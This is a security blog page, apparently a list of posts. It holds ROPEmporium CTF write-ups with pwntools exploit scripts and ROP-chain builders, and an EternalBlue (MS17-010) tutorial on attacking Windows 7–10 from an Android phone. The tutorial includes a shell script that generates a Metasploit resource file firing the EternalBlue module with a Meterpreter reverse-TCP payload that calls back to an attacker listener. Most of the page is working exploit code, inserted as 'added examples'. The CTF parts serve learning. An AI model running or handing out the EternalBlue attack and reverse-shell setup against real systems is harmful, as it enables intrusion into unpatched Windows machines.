Posts

[Simple 90's BOF Tricks] Stack buffer overflows advanced | chapter.1

Hello, people around the world! Sorry for the long gap since the last post; I have had a lot of work, CTFs and certifications, and most people have never seen this blog, which makes me sad too. Anyway, I will start this tutorial series with the goal of sharing my modest knowledge about stack buffer overflows and related topics. I plan to post most of what I learned during my OSCE, CTFs, self-study and so on. The idea behind the series is to explain, in as much detail as possible but in a condensed way, the exploitation techniques that are commonly used in the real world. Most of these techniques are outdated (yes, they are!) in the sense that plain stack smashing is no longer exploitable on big applications such as browsers and kernel drivers. Most modern exploits target dynamic memory, the heap. Heap exploits have their own classifications, just as stack overflows do, such as Use-After-Free, Double-Free, Heap ...

[ROPEmporium]: Bypassing ASLR and NX

Hi, in this tutorial I will share how I solved write4 and split from ROPEmporium, bypassing NX (non-executable stack) and ASLR (Address Space Layout Randomization). The same script works for both examples. Note that the challenge binary itself is not position independent, which is why the .data address used below can be hard-coded; ASLR only moves the stack, heap and shared libraries. The core-file step also requires that the kernel actually writes a core dump for the crashed process (see kernel.core_pattern) so pwntools can read it.

```python
from pwn import *

# context.log_level = "debug"  # enable to run pwntools in debug mode

e = ELF("./write432")               # open the binary
p = process(e.path)                 # create a new process
p.sendline(cyclic(400))             # send a 400-byte cyclic pattern to locate the overflow
p.wait()                            # let it crash
core = p.corefile                   # read the core file produced by the crash
eip_offset = cyclic_find(core.eip)  # the bytes that landed in EIP give the offset to the saved EIP
print()
info("Found eip offset %d", eip_offset)
print()

p = process(e.path)                 # fresh process for the real exploit
p.recv()

# Look up symbols in the binary
printf = e.symbols["printf"]
main = e.symbols["main"]
stdin = e.symbols["stdin"]
fgets = e.symbols["fgets"]
buffer_mem = 0x0804a028             # buffer_mem is the address of .data o...
```
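The cyclic pattern and the kind of chain the script above builds up to, as an added example that is not the post's code: a pure-Python stand-in for pwntools' cyclic()/cyclic_find() (so it runs without pwntools installed), a write-what-where chain of the sort write4 needs, and a dry-run that walks the chain exactly as the CPU would to confirm what ends up in .data. DATA_ADDR is the .data address from the script; the two gadget addresses and TARGET_FUNC are assumed placeholders, not read from write432, and the crash EIP value in the usage is constructed.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def cyclic(length, n=4, alphabet=ALPHABET):
    """De Bruijn pattern in the style of pwntools' cyclic(): every n-byte
    window occurs once, so the bytes that land in EIP identify their offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out[:length])


def cyclic_find(value, maxlen=4096):
    """Offset of a 4-byte window in the pattern; `value` is the int read from
    core.eip (little-endian) or the raw 4 bytes. Returns -1 if not found."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return cyclic(maxlen).find(value)


def p32(v):
    return struct.pack("<I", v & 0xFFFFFFFF)


# DATA_ADDR comes from the script above. The other three are ASSUMED
# placeholders: find the real ones with ropper/ROPgadget and readelf.
POP_EDI_POP_EBP_RET = 0x080485AA  # pop edi; pop ebp; ret
MOV_EDI_EBP_RET = 0x08048543      # mov dword ptr [edi], ebp; ret
DATA_ADDR = 0x0804A028            # writable, fixed address (binary is not PIE)
TARGET_FUNC = 0x08048430          # function to call with the written string


def write_what_where(addr, data):
    """One pop/mov pair per 4-byte chunk: edi = destination, ebp = chunk."""
    chain = b""
    for i in range(0, len(data), 4):
        chunk = data[i:i + 4].ljust(4, b"\0")
        chain += p32(POP_EDI_POP_EBP_RET) + p32(addr + i) + chunk + p32(MOV_EDI_EBP_RET)
    return chain


def build_payload(eip_offset, string, func=TARGET_FUNC):
    """Padding to the saved EIP, the write chain, then func(DATA_ADDR) in cdecl:
    [func][fake return address][argument]."""
    chain = write_what_where(DATA_ADDR, string + b"\0")
    chain += p32(func) + p32(0xDEADBEEF) + p32(DATA_ADDR)
    return b"A" * eip_offset + chain


def simulate(payload, eip_offset, func=TARGET_FUNC):
    """Dry-run the chain the way the CPU would: pop a return address, apply the
    gadget, repeat, stop at the call. Returns (bytes written, argument)."""
    words = [struct.unpack("<I", payload[i:i + 4])[0]
             for i in range(eip_offset, len(payload), 4)]
    mem, edi, ebp, sp = {}, 0, 0, 0
    while sp < len(words):
        ret = words[sp]
        sp += 1
        if ret == POP_EDI_POP_EBP_RET:
            edi, ebp = words[sp], words[sp + 1]
            sp += 2
        elif ret == MOV_EDI_EBP_RET:
            mem[edi] = p32(ebp)
        elif ret == func:
            written = b"".join(mem[a] for a in sorted(mem))
            return written, words[sp + 1]  # words[sp] is the fake return address
        else:
            raise ValueError("returned into unknown address 0x%08x" % ret)
    raise ValueError("chain ended without calling the target")


if __name__ == "__main__":
    crash_eip = 0x6161616C  # constructed: what core.eip holds when "laaa" overwrites it
    offset = cyclic_find(crash_eip)
    payload = build_payload(offset, b"/bin/sh")
    print("eip offset:", offset, "written:", simulate(payload, offset))
```

The dry-run is the check worth keeping in a real exploit script: it catches an off-by-one in the padding or a swapped pop order before you spend time staring at a crash in gdb. Swap the placeholder addresses for the ones ropper reports and the same layout works against the real binary.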

[Tutorial]: MS17-010 in Android world

MS17-010 in Android world

In this tutorial I will show you how to use the exploit called "EternalBlue" to attack Windows 7 through Windows 10 from an Android phone. First of all, I recommend that you learn what EternalBlue is and HOW the exploit works, and I am not responsible for your actions. Be careful.

In this tutorial I used:
- Asus zc553kl with Android 7.0 (Nougat) [192.168.1.7]
- Windows 7 Ultimate 64-bit (VirtualBox) [192.168.1.10]
- Termux app (https://termux.com/)
- Kali Linux (x86)
- Hacker keyboard app (Android)

STARTING

First of all you need to download the Termux app (from the Play Store) and install it. You can learn a lot about using Termux on this blog: https://gauravssnl.wordpress.com/2017/01/15/how-to-use-termux-app-for-android-terminal-emulator-and-linux-environment/ After Termux is updated, you must install our friend metasploit-framework. Use this script to install it: https://github.com/verluchie/termux-meta...
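To make the lab setup above concrete, an added example that is not part of the tutorial: a small POSIX shell function that writes an msfconsole resource script for the EternalBlue module against the addresses listed above (target 192.168.1.10, the phone 192.168.1.7 as listener), with a shape check on both IPs. The module, option and payload names are the real Metasploit ones; the output file name is arbitrary, and it assumes the msfconsole from the Termux install is on PATH.

```shell
#!/bin/sh
# Added example: generate an msfconsole resource script (run with
# `msfconsole -q -r <file>`) for the MS17-010 EternalBlue module.

write_rc() {
    # usage: write_rc <target ip> <attacker ip> <output file>
    rhost=$1
    lhost=$2
    out=$3
    for ip in "$rhost" "$lhost"; do
        # shape check only (four dotted decimal groups); it does not range-check octets
        echo "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || {
            echo "write_rc: not an IPv4 address: $ip" >&2
            return 1
        }
    done
    # stop at `check`: the operator types `exploit` only after the target reports vulnerable
    cat > "$out" <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhost
set LHOST $lhost
set payload windows/x64/meterpreter/reverse_tcp
check
EOF
}

# Lab values from the tutorial: the Windows 7 x64 VM as target, the phone as listener.
write_rc 192.168.1.10 192.168.1.7 ms17_010.rc && cat ms17_010.rc
```

The script deliberately ends at `check` rather than `exploit`: the module's check confirms the SMBv1 target is unpatched before you fire a kernel-level exploit that can blue-screen the box, and the x64 reverse payload matches the 64-bit Windows 7 VM used in the tutorial.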

[ROPEmporium]: Callme

Callme

Hi, in this write-up I will try to show some techniques for using pwntools in exploitation. In this case I will use the challenge called "callme" from ROPEmporium: https://ropemporium.com/challenge/callme.html Hope you enjoy ;)

To begin, let's try to understand how the program flow works.

```
root@kali:~/Desktop/ropemporium/me/callme# ./callme32
callme by ROP Emporium
32bits

Hope you read the instructions...

> blabla
Exiting
```

So, let's read the instructions. Text from the ROPEmporium website, under "Correct order": "Important: To dispose of the need for any RE we'll tell you the following: You must call callme_one(), callme_two() and callme_three() in that order, each with the arguments 1,2,3 e.g. callme_one(1,2,3) to print the flag...."

OK! Now we have an idea of what the program expects: we need to execute functions which are not in the callme32 binary but in the libcallme32.so file. These funct...
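The call sequence the instructions require, as an added example that is not the write-up's code: a 32-bit chain that calls callme_one, callme_two and callme_three in that order with (1, 2, 3), using a pop-three-words gadget as each call's return address so the three arguments are cleared before the next call, plus a decoder that walks the chain and lists the calls it would make. The PLT and gadget addresses and the EIP offset of 44 are assumed placeholders, not read from callme32; get the real ones with objdump/ropper and a cyclic pattern.

```python
import struct


def p32(v):
    return struct.pack("<I", v & 0xFFFFFFFF)


# ASSUMED placeholders, not read from callme32: PLT stubs of the three imported
# functions and a gadget that drops three stack words (pop esi; pop edi; pop ebp; ret).
PLT = {"callme_one": 0x080484F0, "callme_two": 0x08048550, "callme_three": 0x080484E0}
POP3_RET = 0x080487F9


def call32(func, args, cleanup=POP3_RET):
    """cdecl call via ret: [func][return address][arg1][arg2][arg3]. Using the
    pop3 gadget as the return address discards the three arguments, so the next
    function address is back on top of the stack when the gadget's ret runs."""
    if len(args) != 3:
        raise ValueError("POP3_RET cleans exactly three argument words")
    return p32(func) + p32(cleanup) + b"".join(p32(a) for a in args)


def build_chain(eip_offset, calls):
    """calls: list of (function name, (arg1, arg2, arg3)) in the required order."""
    return b"A" * eip_offset + b"".join(call32(PLT[name], args) for name, args in calls)


def decode_chain(chain, eip_offset, cleanup=POP3_RET):
    """Walk the chain as the CPU would and return the (name, args) it performs;
    raises if a call lacks the cleanup gadget, which would desynchronise the rest."""
    names = {addr: name for name, addr in PLT.items()}
    words = [struct.unpack("<I", chain[i:i + 4])[0]
             for i in range(eip_offset, len(chain), 4)]
    calls, sp = [], 0
    while sp < len(words):
        func = words[sp]
        if func not in names:
            raise ValueError("returned into unknown address 0x%08x" % func)
        if sp + 1 >= len(words) or words[sp + 1] != cleanup:
            raise ValueError("no argument cleanup after %s" % names[func])
        calls.append((names[func], tuple(words[sp + 2:sp + 5])))
        sp += 5
    return calls


CALLS = [("callme_one", (1, 2, 3)),
         ("callme_two", (1, 2, 3)),
         ("callme_three", (1, 2, 3))]

if __name__ == "__main__":
    chain = build_chain(44, CALLS)  # 44 is a placeholder EIP offset
    print(len(chain), decode_chain(chain, 44))
```

The point the decoder makes explicit is the 32-bit calling convention: without the pop3 gadget, the first function would "return" into the word 1, and the remaining calls would never run. On the 64-bit variant the arguments travel in registers instead, so the chain needs pop rdi/rsi/rdx gadgets before each call rather than a cleanup gadget after it.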